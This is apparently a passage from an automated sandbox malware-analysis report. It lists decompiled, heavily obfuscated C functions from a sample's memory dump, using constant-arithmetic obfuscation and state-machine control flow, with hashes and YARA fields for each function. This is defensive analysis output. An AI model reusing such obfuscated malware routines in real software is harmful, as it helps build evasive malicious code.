                                              				_v24 = _v24 + 0x3fe;
                                              				_v24 = _v24 ^ 0x66b19dc3;
                                              				_v12 = 0x275a;
                                              				_v12 = _v12 ^ 0xee83f1bc;
                                              				_v12 = _v12 ^ 0xee83c69b;
                                              				_v20 = 0x82c0;
                                              				_v20 = _v20 | 0x74e44d6f;
                                              				_v20 = _v20 ^ 0xeca8f7fc;
                                              				_v20 = _v20 ^ 0x984c40be;
                                              				_v32 = 0xcbb2;
                                              				_v32 = _v32 ^ 0xf8a1ef7c;
                                              				_t122 = 0x26;
                                              				_v32 = _v32 / _t122;
                                              				_v32 = _v32 ^ 0xc0a4f16a;
                                              				_v32 = _v32 ^ 0xc62e2f9a;
                                              				_v28 = 0xce4d;
                                              				_t123 = 0x68;
                                              				_v28 = _v28 / _t123;
                                              				_t124 = 0xf;
                                              				_v28 = _v28 / _t124;
                                              				_v28 = _v28 ^ 0x15eb9a2e;
                                              				_v28 = _v28 ^ 0x15ebc86f;
                                              				_v4 = 0x1911;
                                              				_v4 = _v4 ^ 0x7b1b0330;
                                              				_v4 = _v4 ^ 0x7b1b2d08;
                                              				_v8 = 0x92f;
                                              				_v8 = _v8 >> 0xb;
                                              				_v8 = _v8 ^ 0x00005602;
                                              				_t108 = E002385BA(_t124);
                                              				_t144 = _a4;
                                              				_t146 = _t108;
                                              				_v36 = 0x94f3;
                                              				_v36 = _v36 + 0xffff06f8;
                                              				_v36 = _v36 | 0xf59d433d;
                                              				_v36 = _v36 >> 0xe;
                                              				_t148 = _t144 + 0x24;
                                              				_v36 = _v36 ^ 0x0003ffff;
                                              				_t120 = E0022E29C(_v16, _v24, _t144 + 0x24);
                                              				_t110 =  *((intOrPtr*)(_t144 + 8));
                                              				if(_t110 != _v36 && _t110 != _t146) {
                                              					_t127 =  *((intOrPtr*)(_t144 + 0x18));
                                              					if(_t127 != _v36 && _t127 != _t146) {
                                              						_t145 = _a8;
                                              						_t128 =  *_t145;
                                              						if(E00238D05(_t128, _t120) == 0) {
                                              							_push(_t128);
                                              							_push(_t128);
                                              							_t147 = E00228736(0x224);
                                              							if(_t147 != 0) {
                                              								_t95 = _t147 + 0xc; // 0xc
                                              								E00226636(_t95, _v28, _v4, _v8, _t148);
                                              								 *_t147 = _t120;
                                              								 *((intOrPtr*)(_t147 + 0x220)) =  *_t145;
                                              								 *_t145 = _t147;
                                              							}
                                              						}
                                              					}
                                              				}
                                              				return 1;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: /$4A3$9*$oMt
                                              • API String ID: 0-1186868077
                                              • Opcode ID: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
                                              • Instruction ID: 0a16274f2c4661f6b1bc49b322e46626a5471621d82d84454cb02992b481d9fc
                                              • Opcode Fuzzy Hash: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
                                              • Instruction Fuzzy Hash: 2E5156B16083429FD358CF25D48A90BFBE1FB98718F204A1CF49596260C7B4DA59CF86
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00222A30(intOrPtr _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				char _v52;
                                              				intOrPtr _v56;
                                              				char _v60;
                                              				char _v124;
                                              				void* _t120;
                                              				signed int _t130;
                                              				signed int _t131;
                                              				signed int _t132;
                                              				intOrPtr _t146;
                                              
                                              				_v12 = 0xa0d7;
                                              				_v12 = _v12 + 0x7eb;
                                              				_v12 = _v12 + 0xffff9690;
                                              				_t130 = 0x70;
                                              				_v12 = _v12 / _t130;
                                              				_v12 = _v12 ^ 0x00005cb7;
                                              				_v36 = 0xa6e2;
                                              				_t131 = 0x7c;
                                              				_t146 = _a4;
                                              				_v36 = _v36 * 0x6c;
                                              				_v36 = _v36 ^ 0x00462f2b;
                                              				_v20 = 0xf5ce;
                                              				_v20 = _v20 + 0xec5e;
                                              				_v20 = _v20 | 0x882d1c6f;
                                              				_v20 = _v20 ^ 0x882decee;
                                              				_v8 = 0xef73;
                                              				_v8 = _v8 * 0x50;
                                              				_v8 = _v8 ^ 0x984778b6;
                                              				_v8 = _v8 | 0x0acb781a;
                                              				_v8 = _v8 ^ 0x9acfaccf;
                                              				_v16 = 0xf20c;
                                              				_t132 = 0x6d;
                                              				_v16 = _v16 / _t131;
                                              				_v16 = _v16 | 0x2a1cc570;
                                              				_v16 = _v16 * 0x5c;
                                              				_v16 = _v16 ^ 0x225769f1;
                                              				_v28 = 0xd318;
                                              				_v28 = _v28 / _t132;
                                              				_v28 = _v28 ^ 0x955bcf9a;
                                              				_v28 = _v28 ^ 0x955bcc47;
                                              				_v40 = 0xc2b8;
                                              				_v40 = _v40 + 0x609d;
                                              				_v40 = _v40 ^ 0x00014342;
                                              				_v24 = 0x21cc;
                                              				_v24 = _v24 << 5;
                                              				_v24 = _v24 << 0xa;
                                              				_v24 = _v24 ^ 0x10e64576;
                                              				_v48 = 0xc8ed;
                                              				_v48 = _v48 + 0xffffe729;
                                              				_v48 = _v48 ^ 0x00009812;
                                              				_v32 = 0xdf82;
                                              				_v32 = _v32 ^ 0xa0cf88d1;
                                              				_v32 = _v32 >> 4;
                                              				_v32 = _v32 ^ 0x0a0ce5c9;
                                              				_v44 = 0xf2d1;
                                              				_v44 = _v44 + 0x3831;
                                              				_v44 = _v44 ^ 0x00011e20;
                                              				_t120 =  *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 1, 0);
                                              				_t149 = _t120;
                                              				if(_t120 != 0) {
                                              					E00232349(_v12, _v36, _v20, _v8, _t132);
                                              					_v60 =  &_v124;
                                              					_v56 = E0022F85D(_v16, _t149,  &_v52, _v28, _v40, _v24);
                                              					 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0xa,  &_v60,  &_v124);
                                              					E00232025(_v48, _v56, _v32, _v44);
                                              				}
                                              				return 0;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: +/F$18$^$s
                                              • API String ID: 0-1171060364
                                              • Opcode ID: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
                                              • Instruction ID: a5d4d4bb3229877b2435734199c38f24c42fab5800b21767527859a7e8fe29ac
                                              • Opcode Fuzzy Hash: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
                                              • Instruction Fuzzy Hash: D651F372D01309EBEF08CFE1C94A9DEBBB2FB04314F208159D511B62A0D7B96A55DF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E002373AC() {
                                              				intOrPtr _v8;
                                              				intOrPtr _v12;
                                              				signed int _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				char _v28;
                                              				char _v32;
                                              				char _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				signed int _v64;
                                              				signed int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				signed int _v88;
                                              				signed int _v92;
                                              				signed int _v96;
                                              				signed int _v100;
                                              				signed int _v104;
                                              				signed int _v108;
                                              				signed int _t194;
                                              				intOrPtr _t196;
                                              				intOrPtr _t199;
                                              				intOrPtr _t202;
                                              				intOrPtr _t204;
                                              				intOrPtr _t205;
                                              				signed int _t207;
                                              				signed int _t208;
                                              				signed int _t209;
                                              				signed int _t210;
                                              				void* _t238;
                                              				char _t242;
                                              				signed int* _t243;
                                              				void* _t245;
                                              
                                              				_t243 =  &_v108;
                                              				_v24 = 0x44d5d8;
                                              				_t205 = 0;
                                              				_v20 = 0;
                                              				_v40 = 0x23cf;
                                              				_v40 = _v40 ^ 0xbe38916f;
                                              				_v40 = _v40 ^ 0xbe38820d;
                                              				_v108 = 0x2e00;
                                              				_v108 = _v108 + 0xe6b6;
                                              				_v108 = _v108 * 0x5d;
                                              				_t238 = 0x219f160f;
                                              				_t207 = 0xe;
                                              				_v108 = _v108 / _t207;
                                              				_v108 = _v108 ^ 0x000708e5;
                                              				_v56 = 0xac50;
                                              				_t208 = 0x74;
                                              				_v56 = _v56 / _t208;
                                              				_v56 = _v56 ^ 0x00005612;
                                              				_v48 = 0xf915;
                                              				_v48 = _v48 + 0xc201;
                                              				_v48 = _v48 ^ 0x0001bde6;
                                              				_v76 = 0xa4d1;
                                              				_v76 = _v76 << 0xb;
                                              				_v76 = _v76 + 0x2090;
                                              				_v76 = _v76 ^ 0x0526efdc;
                                              				_v104 = 0x1331;
                                              				_v104 = _v104 ^ 0x9278d736;
                                              				_v104 = _v104 << 0xf;
                                              				_v104 = _v104 << 3;
                                              				_v104 = _v104 ^ 0x101c0c8f;
                                              				_v52 = 0x4912;
                                              				_t209 = 0x53;
                                              				_v52 = _v52 * 0x5f;
                                              				_v52 = _v52 ^ 0x001b11ba;
                                              				_v80 = 0x36f7;
                                              				_v80 = _v80 | 0x0c78674c;
                                              				_v80 = _v80 + 0xffff3df1;
                                              				_v80 = _v80 ^ 0x0c77a943;
                                              				_v84 = 0x9f3a;
                                              				_v84 = _v84 << 8;
                                              				_v84 = _v84 ^ 0x7966a269;
                                              				_v84 = _v84 ^ 0x79f9b7a1;
                                              				_v60 = 0xac57;
                                              				_v60 = _v60 ^ 0x3fa2bf2a;
                                              				_v60 = _v60 ^ 0x3fa276dc;
                                              				_v88 = 0xe218;
                                              				_v88 = _v88 | 0xea5468c5;
                                              				_v88 = _v88 << 0x10;
                                              				_v88 = _v88 ^ 0xeadd1cb3;
                                              				_v64 = 0x6c6b;
                                              				_v64 = _v64 + 0xffff53e7;
                                              				_v64 = _v64 ^ 0xffffd13f;
                                              				_v92 = 0x6a88;
                                              				_v92 = _v92 >> 1;
                                              				_v92 = _v92 ^ 0xe005aace;
                                              				_v92 = _v92 ^ 0xe005a166;
                                              				_v100 = 0xd6b9;
                                              				_v100 = _v100 ^ 0x5f91bbd5;
                                              				_v100 = _v100 ^ 0x5ce69075;
                                              				_v100 = _v100 >> 0xf;
                                              				_v100 = _v100 ^ 0x00003faf;
                                              				_v44 = 0xc8e7;
                                              				_v44 = _v44 / _t209;
                                              				_v44 = _v44 ^ 0x00005627;
                                              				_v72 = 0xdbaa;
                                              				_t210 = 0x49;
                                              				_v72 = _v72 / _t210;
                                              				_v72 = _v72 | 0xff4e0ba5;
                                              				_v72 = _v72 ^ 0xff4e47cb;
                                              				_v68 = 0x962f;
                                              				_v68 = _v68 >> 0xe;
                                              				_v68 = _v68 << 4;
                                              				_v68 = _v68 ^ 0x00006f62;
                                              				_v96 = 0xef5c;
                                              				_t211 = 0x44;
                                              				_v96 = _v96 * 0x25;
                                              				_v96 = _v96 / _t211;
                                              				_v96 = _v96 << 1;
                                              				_v96 = _v96 ^ 0x0001262b;
                                              				_t237 = _v36;
                                              				_t242 = _v36;
                                              				goto L1;
                                              				do {
                                              					while(1) {
                                              						L1:
                                              						_t245 = _t238 - 0x219f160f;
                                              						if(_t245 > 0) {
                                              							break;
                                              						}
                                              						if(_t245 == 0) {
                                              							_t238 = 0x2394b362;
                                              							continue;
                                              						}
                                              						if(_t238 == 0x8b9146f) {
                                              							E00239465(_v68, _t237, _v96);
                                              							L23:
                                              							return _t205;
                                              						}
                                              						if(_t238 == 0x93670d9) {
                                              							_t194 = E0023340A(_v80,  &_v32, _v84,  &_v16);
                                              							asm("sbb esi, esi");
                                              							_pop(_t211);
                                              							_t238 = ( ~_t194 & 0xf6f92468) + 0x24090f6a;
                                              							continue;
                                              						}
                                              						if(_t238 == 0x155b4458) {
                                              							_t196 = E002389D3(_t242, _v108,  &_v36, _v56);
                                              							_t237 = _t196;
                                              							_pop(_t211);
                                              							if(_t196 == 0) {
                                              								goto L23;
                                              							}
                                              							_t238 = 0x35a1dc77;
                                              							continue;
                                              						}
                                              						if(_t238 != 0x1b0233d2) {
                                              							goto L20;
                                              						} else {
                                              							_t199 =  *0x23ca2c; // 0x4d8300
                                              							E00236128(_v60, _v88, _v12, _t199 + 0x230, _v64, _v92, _v8 + 1);
                                              							_t202 =  *0x23ca2c; // 0x4d8300
                                              							_t211 = _v16;
                                              							_t243 =  &(_t243[5]);
                                              							_t205 = 1;
                                              							_t238 = 0x24090f6a;
                                              							 *(_t202 + 0x450) = _v16;
                                              							continue;
                                              						}
                                              					}
                                              					if(_t238 == 0x2394b362) {
                                              						_t242 = E0022F4D0(_t211);
                                              						_t238 = 0x155b4458;
                                              						goto L20;
                                              					}
                                              					if(_t238 == 0x24090f6a) {
                                              						E0022F536(_v100, _v44, _v72, _v32);
                                              						_pop(_t211);
                                              						_t238 = 0x8b9146f;
                                              						goto L1;
                                              					}
                                              					if(_t238 != 0x35a1dc77) {
                                              						goto L20;
                                              					}
                                              					_t238 = 0x8b9146f;
                                              					if(_v36 > 2) {
                                              						_t211 = _v48;
                                              						_t204 = E0022EA4C( *((intOrPtr*)(_t237 + 8)), _v76, _v104,  &_v28, _v52);
                                              						_t243 =  &(_t243[4]);
                                              						_v32 = _t204;
                                              						if(_t204 != 0) {
                                              							_t238 = 0x93670d9;
                                              						}
                                              					}
                                              					goto L1;
                                              					L20:
                                              				} while (_t238 != 0x36620d3);
                                              				goto L23;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 'V$\$bo
                                              • API String ID: 0-4178943049
                                              • Opcode ID: 54bbf05af18814b9a6df618109305a24e299ee10e84e889a4d901e8013b85d17
                                              • Instruction ID: 118fe5d87acfd89e7527d32cbd7cd5d1379f99dd154edd978b29c5756cf75081
                                              • Opcode Fuzzy Hash: 54bbf05af18814b9a6df618109305a24e299ee10e84e889a4d901e8013b85d17
                                              • Instruction Fuzzy Hash: 54A162B251C3429FD768CF28C48940BFBF1FBC4758F50892DF99996260C7B58A588F86
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 94%
                                              			E002296CD(signed int* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                              				char _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				signed int _v88;
                                              				unsigned int _v92;
                                              				signed int _v96;
                                              				signed int _v100;
                                              				signed int _v104;
                                              				signed int _v108;
                                              				signed int _v112;
                                              				signed int _v116;
                                              				signed int _v120;
                                              				unsigned int _v124;
                                              				signed int _v128;
                                              				signed int _v132;
                                              				signed int _v136;
                                              				signed int _v140;
                                              				void* _t162;
                                              				signed int _t179;
                                              				void* _t192;
                                              				signed int _t193;
                                              				signed int _t194;
                                              				signed int _t195;
                                              				signed int _t196;
                                              				signed int _t197;
                                              				void* _t200;
                                              				intOrPtr* _t222;
                                              				signed int* _t223;
                                              				signed int* _t226;
                                              
                                              				_push(_a8);
                                              				_t222 = _a4;
                                              				_t223 = __ecx;
                                              				_push(_t222);
                                              				_push(__ecx);
                                              				E0022602B(_t162);
                                              				_v80 = 0xadf4;
                                              				_t226 =  &(( &_v140)[4]);
                                              				_t200 = 0xade8ac2;
                                              				_t193 = 0x38;
                                              				_v80 = _v80 / _t193;
                                              				_v80 = _v80 ^ 0x00005e4d;
                                              				_v88 = 0xd682;
                                              				_v88 = _v88 ^ 0xf51d39be;
                                              				_v88 = _v88 ^ 0xf51dab09;
                                              				_v96 = 0x72b2;
                                              				_v96 = _v96 ^ 0xfa4c809d;
                                              				_v96 = _v96 ^ 0xfa4c99cb;
                                              				_v116 = 0x90ca;
                                              				_v116 = _v116 | 0x91d06c09;
                                              				_v116 = _v116 ^ 0x5d2d7dc0;
                                              				_v116 = _v116 ^ 0xccfdf140;
                                              				_v124 = 0x94f4;
                                              				_v124 = _v124 >> 9;
                                              				_t194 = 0x7e;
                                              				_v124 = _v124 / _t194;
                                              				_v124 = _v124 >> 1;
                                              				_v124 = _v124 ^ 0x00005a93;
                                              				_v92 = 0xb2da;
                                              				_v92 = _v92 >> 0xf;
                                              				_v92 = _v92 ^ 0x00004526;
                                              				_v132 = 0xfe39;
                                              				_v132 = _v132 ^ 0x94a2bb32;
                                              				_v132 = _v132 + 0xffff197d;
                                              				_v132 = _v132 + 0xa385;
                                              				_v132 = _v132 ^ 0x94a23d21;
                                              				_v104 = 0xe4d2;
                                              				_v104 = _v104 ^ 0x49cfaa80;
                                              				_v104 = _v104 | 0x48b9e868;
                                              				_v104 = _v104 ^ 0x49ffe136;
                                              				_v112 = 0xb598;
                                              				_v112 = _v112 ^ 0x0d96fbe5;
                                              				_v112 = _v112 + 0x88b9;
                                              				_v112 = _v112 ^ 0x0d96d484;
                                              				_v136 = 0x3e03;
                                              				_v136 = _v136 ^ 0x29ac334c;
                                              				_v136 = _v136 >> 9;
                                              				_v136 = _v136 << 8;
                                              				_v136 = _v136 ^ 0x14d602a1;
                                              				_v120 = 0xd3c3;
                                              				_t195 = 0x26;
                                              				_v120 = _v120 / _t195;
                                              				_t196 = 0x3e;
                                              				_v120 = _v120 * 0x17;
                                              				_v120 = _v120 ^ 0x0000f1c0;
                                              				_v140 = 0x72b1;
                                              				_v140 = _v140 + 0xffffab40;
                                              				_v140 = _v140 << 0xe;
                                              				_v140 = _v140 / _t196;
                                              				_v140 = _v140 ^ 0x001e8f72;
                                              				_v128 = 0x9994;
                                              				_v128 = _v128 + 0xffff8c6c;
                                              				_v128 = _v128 + 0xa4f6;
                                              				_t197 = 0x3d;
                                              				_v128 = _v128 / _t197;
                                              				_v128 = _v128 ^ 0x00001242;
                                              				_v100 = 0x8258;
                                              				_v100 = _v100 + 0xffff85b7;
                                              				_v100 = _v100 * 0x51;
                                              				_v100 = _v100 ^ 0x000280a1;
                                              				_v84 = 0x5c44;
                                              				_v84 = _v84 ^ 0x1285eccb;
                                              				_v84 = _v84 ^ 0x12858e57;
                                              				_v108 = 0x7f88;
                                              				_v108 = _v108 | 0x4d438ffe;
                                              				_v108 = _v108 + 0xffff02b4;
                                              				_v108 = _v108 ^ 0x4d436acf;
                                              				do {
                                              					while(_t200 != 0xade8ac2) {
                                              						if(_t200 == 0xeed9730) {
                                              							_push(_t200);
                                              							_push(_t200);
                                              							_t179 = E00228736(_t223[1]);
                                              							 *_t223 = _t179;
                                              							__eflags = _t179;
                                              							if(__eflags != 0) {
                                              								_t200 = 0x173d5c4e;
                                              								continue;
                                              							}
                                              						} else {
                                              							if(_t200 == 0xffe2862) {
                                              								E0023360F( &_v76, _v120, _v140,  *_t222, _v128);
                                              								_t226 =  &(_t226[3]);
                                              								_t200 = 0x220c9c88;
                                              								continue;
                                              							} else {
                                              								if(_t200 == 0x173d5c4e) {
                                              									E002350F2( &_v76, _v104, _v112, _v136, _t223);
                                              									_t226 =  &(_t226[3]);
                                              									_t200 = 0xffe2862;
                                              									continue;
                                              								} else {
                                              									if(_t200 == 0x220c9c88) {
                                              										E00227998(_v100, _v84, __eflags, _t222 + 4,  &_v76, _v108);
                                              									} else {
                                              										if(_t200 != 0x2d9f638c) {
                                              											goto L13;
                                              										} else {
                                              											_t207 = _t222;
                                              											_t223[1] = E00237A0F(_t222);
                                              											_t192 = E002278A5(_t222, _t207, 0x1000, _t207, 0x400);
                                              											_t226 =  &(_t226[4]);
                                              											_t200 = 0xeed9730;
                                              											_t223[1] = _t223[1] + _t192;
                                              											continue;
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						L16:
                                              						__eflags =  *_t223;
                                              						_t161 =  *_t223 != 0;
                                              						__eflags = _t161;
                                              						return 0 | _t161;
                                              					}
                                              					 *_t223 = 0;
                                              					_t200 = 0x2d9f638c;
                                              					_t223[1] = 0;
                                              					L13:
                                              					__eflags = _t200 - 0x18ac994b;
                                              				} while (__eflags != 0);
                                              				goto L16;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: &E$D\$M^
                                              • API String ID: 0-182273106
                                              • Opcode ID: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
                                              • Instruction ID: e180c5684d29d170f3f8387aaee74c73b7a4a7078e523a286e60377ebc09245a
                                              • Opcode Fuzzy Hash: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
                                              • Instruction Fuzzy Hash: F4816471518341AFD358CF65C88981BBBE0BBD8354F50891CF196862A1D3B6CA99CF42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E0022153C() {
                                              				char _v520;
                                              				signed int _v524;
                                              				signed int _v528;
                                              				signed int _v532;
                                              				signed int _v536;
                                              				signed int _v540;
                                              				signed int _v544;
                                              				signed int _v548;
                                              				signed int _v552;
                                              				signed int _v556;
                                              				signed int _v560;
                                              				signed int _t116;
                                              				void* _t117;
                                              				void* _t119;
                                              				signed int _t122;
                                              				signed int _t134;
                                              				void* _t136;
                                              				signed int _t137;
                                              				signed int* _t138;
                                              
                                              				_t138 =  &_v560;
                                              				_v528 = 0xa2e9;
                                              				_v528 = _v528 + 0xfffffe64;
                                              				_t119 = 0x3a74a7f9;
                                              				_v528 = _v528 ^ 0x0000e8bc;
                                              				_v532 = 0xc148;
                                              				_v532 = _v532 + 0x228e;
                                              				_v532 = _v532 ^ 0x0000dc63;
                                              				_v548 = 0x43c;
                                              				_v548 = _v548 + 0xffff6922;
                                              				_v548 = _v548 | 0xfd2a2fe1;
                                              				_v548 = _v548 ^ 0xb6db9be5;
                                              				_v548 = _v548 ^ 0x4924f3d5;
                                              				_v544 = 0x1b71;
                                              				_v544 = _v544 ^ 0xba1667e6;
                                              				_v544 = _v544 >> 2;
                                              				_v544 = _v544 << 7;
                                              				_v544 = _v544 ^ 0x42cfc722;
                                              				_v540 = 0x29dd;
                                              				_v540 = _v540 + 0xa2;
                                              				_v540 = _v540 ^ 0xc29808bd;
                                              				_v540 = _v540 + 0xffff2b53;
                                              				_v540 = _v540 ^ 0xc2975a13;
                                              				_v556 = 0x7857;
                                              				_v556 = _v556 ^ 0xa059c8e7;
                                              				_v556 = _v556 << 9;
                                              				_v556 = _v556 << 4;
                                              				_v556 = _v556 ^ 0x361613d4;
                                              				_v560 = 0x6ef2;
                                              				_v560 = _v560 ^ 0x7dc12174;
                                              				_v560 = _v560 * 0x52;
                                              				_t136 = 0;
                                              				_v560 = _v560 ^ 0x47eb388f;
                                              				_v536 = 0x33fe;
                                              				_v536 = _v536 + 0x28fb;
                                              				_v536 = _v536 ^ 0x000029c0;
                                              				_v552 = 0x40f6;
                                              				_v552 = _v552 | 0x9b4debbc;
                                              				_v552 = _v552 + 0x1ce1;
                                              				_t134 = 0x7e;
                                              				_t137 = _v536;
                                              				_t135 = _v536;
                                              				_v552 = _v552 / _t134;
                                              				_v552 = _v552 ^ 0x013b83e5;
                                              				_v524 = 0xe5bd;
                                              				_v524 = _v524 ^ 0x97a1ef4c;
                                              				_v524 = _v524 ^ 0x97a11b87;
                                              				do {
                                              					while(_t119 != 0x6cc9294) {
                                              						if(_t119 == 0xcd96d8e) {
                                              							_v560 = 0x65f6;
                                              							_t122 = 0x33;
                                              							_v560 = _v560 / _t122;
                                              							_v560 = _v560 + 0xffffea35;
                                              							_v560 = _v560 ^ 0xd5d8ecd6;
                                              							_t136 =  ==  ? 1 : _t136;
                                              						} else {
                                              							if(_t119 == 0x11374e9c) {
                                              								E0022E29C(_v552, _v524, _t137);
                                              								_t119 = 0xcd96d8e;
                                              								continue;
                                              							} else {
                                              								if(_t119 == 0x31a842b3) {
                                              									_t116 = E00228697();
                                              									_t135 = _t116;
                                              									if(_t116 != 0) {
                                              										_t119 = 0x34255e69;
                                              										continue;
                                              									}
                                              								} else {
                                              									if(_t119 == 0x34255e69) {
                                              										_t117 = E002260B9( &_v520, _v548, _v544, _t119, _v540, _t135, _v556);
                                              										_t138 =  &(_t138[5]);
                                              										if(_t117 != 0) {
                                              											_t119 = 0x6cc9294;
                                              											continue;
                                              										}
                                              									} else {
                                              										if(_t119 != 0x3a74a7f9) {
                                              											goto L14;
                                              										} else {
                                              											_t119 = 0x31a842b3;
                                              											continue;
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						L17:
                                              						return _t136;
                                              					}
                                              					_t137 = E002228CE( &_v520, _v560, _v536);
                                              					_t119 = 0x11374e9c;
                                              					L14:
                                              				} while (_t119 != 0x55f7722);
                                              				goto L17;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: Wx$i^%4$i^%4
                                              • API String ID: 0-1584002782
                                              • Opcode ID: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
                                              • Instruction ID: 9e1d6fdb3593b6bbb9f511f60d286fd3ef2d42f35d77fd4fc17ed35f33860f77
                                              • Opcode Fuzzy Hash: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
                                              • Instruction Fuzzy Hash: 4D5167311183429BD3A8CE65D18982BFBE1BBD4718F140E1DF496922A0D7B4DA69CF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 93%
                                              			E00237D03() {
                                              				signed int _v4;
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				intOrPtr _t105;
                                              				intOrPtr _t112;
                                              				signed int _t114;
                                              				signed int _t115;
                                              				signed int _t116;
                                              				intOrPtr _t117;
                                              				void* _t119;
                                              				void* _t129;
                                              				signed int* _t131;
                                              
                                              				_t131 =  &_v44;
                                              				_v8 = 0x68fc;
                                              				_v8 = _v8 + 0xbb36;
                                              				_v8 = _v8 ^ 0x000162e9;
                                              				_v44 = 0xabcf;
                                              				_t114 = 0x5a;
                                              				_v44 = _v44 / _t114;
                                              				_v44 = _v44 << 5;
                                              				_t129 = 0x1aabdcf3;
                                              				_v44 = _v44 ^ 0x41a75d37;
                                              				_v44 = _v44 ^ 0x41a744f3;
                                              				_v12 = 0xa837;
                                              				_v12 = _v12 + 0xbdd3;
                                              				_v12 = _v12 ^ 0x0001592e;
                                              				_v36 = 0x1a64;
                                              				_v36 = _v36 + 0x1ecf;
                                              				_v36 = _v36 | 0x383b765c;
                                              				_v36 = _v36 ^ 0x383b27b5;
                                              				_v40 = 0x1cb7;
                                              				_v40 = _v40 | 0xfad83379;
                                              				_t115 = 0x73;
                                              				_v40 = _v40 / _t115;
                                              				_v40 = _v40 ^ 0x022e74ac;
                                              				_v16 = 0x5673;
                                              				_v16 = _v16 << 4;
                                              				_v16 = _v16 ^ 0x00050551;
                                              				_v20 = 0x8ddb;
                                              				_v20 = _v20 + 0xffffc9bf;
                                              				_t116 = 0x22;
                                              				_v20 = _v20 * 0x54;
                                              				_v20 = _v20 ^ 0x001c9060;
                                              				_v24 = 0x24b0;
                                              				_v24 = _v24 ^ 0x7eaabc9b;
                                              				_v24 = _v24 ^ 0x558f972f;
                                              				_v24 = _v24 ^ 0x2b251b7e;
                                              				_v28 = 0xbf97;
                                              				_v28 = _v28 + 0xffff41a2;
                                              				_v28 = _v28 * 0x14;
                                              				_v28 = _v28 ^ 0x00001fe8;
                                              				_v32 = 0x3a57;
                                              				_v32 = _v32 << 3;
                                              				_v32 = _v32 ^ 0x30418ed0;
                                              				_v32 = _v32 ^ 0x30407688;
                                              				_v4 = 0xf5c8;
                                              				_v4 = _v4 / _t116;
                                              				_v4 = _v4 ^ 0x00000add;
                                              				_t117 =  *0x23ca30; // 0x0
                                              				do {
                                              					while(_t129 != 0x15241428) {
                                              						if(_t129 == 0x1aabdcf3) {
                                              							_push(_t117);
                                              							_push(_t117);
                                              							_t119 = 0x2c;
                                              							_t117 = E00228736(_t119);
                                              							 *0x23ca30 = _t117;
                                              							if(_t117 != 0) {
                                              								_t129 = 0x337355f8;
                                              								continue;
                                              							}
                                              						} else {
                                              							if(_t129 != 0x337355f8) {
                                              								goto L8;
